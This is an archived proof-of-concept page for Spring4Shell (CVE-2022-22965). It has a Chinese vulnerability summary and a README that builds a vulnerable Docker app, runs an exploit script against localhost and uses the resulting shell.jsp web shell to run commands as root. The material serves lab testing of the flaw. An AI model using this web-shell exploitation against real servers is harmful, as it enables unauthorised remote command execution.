关联漏洞
标题:
Spring Framework 代码注入漏洞
(CVE-2022-22965)
描述:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞,该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响:5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。
描述
CVE-2022-22965 (Spring4Shell) Proof of Concept
介绍
# CVE-2022-22965 (Spring4Shell) Proof of Concept
## Test the RCE (Remote Code Execution) in Spring Core
### Build the image
BuildKit based build is required so you need to enable it.
Easiest way is to set the **DOCKER_BUILDKIT=1** environment variable when invoking the docker build command, such as:
```console
$ DOCKER_BUILDKIT=1 docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core
```
Otherwise to enable docker BuildKit by default, set daemon configuration in _/etc/docker/daemon.json_ feature to true and restart the daemon:
```json
{ "features": { "buildkit": true } }
```
This way you can execute simply
```console
$ docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core
```
### Test the vulnerable application
```console
$ curl localhost:8080/spring4shell/exploitme
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Spring4Shell PoC Spring Application</title>
</head>
<body>
Hello World! Exploit me!
</body>
</html>
```
### Run the exploit
```console
$ python3 exploit-core.py --url "http://localhost:8080/spring4shell/exploitme" --file shell
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id
```
If everything went right, execute arbitrary commands in the container through the Tomcat HTTP port, such as:
```console
$ curl http://localhost:8080/shell.jsp\?cmd\=id --output -
uid=0(root) gid=0(root) groups=0(root)
//
```
```console
$ curl http://localhost:8080/shell.jsp\?cmd\=whoami --output -
root
//
```
```console
$ curl http://localhost:8080/shell.jsp\?cmd\=cat%20/etc/issue --output -
Debian GNU/Linux 11 \n \l
//
```
文件快照
[4.0K] /data/pocs/4f94f583615adb8fb03adefda190eb044cceacc1
├── [ 349] Dockerfile.core
├── [4.0K] exploit-core.py
├── [4.0K] img
│ └── [ 10K] spring4shell-logo.png
├── [1.5K] pom-core.xml
├── [2.0K] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] it
│ └── [4.0K] sunnyvale
│ └── [4.0K] spring4shell
│ ├── [ 669] ExploitMeController.java
│ ├── [ 323] ExploitMe.java
│ └── [ 447] Spring4ShellApplication.java
└── [4.0K] resources
└── [4.0K] templates
└── [ 181] hello.html
9 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。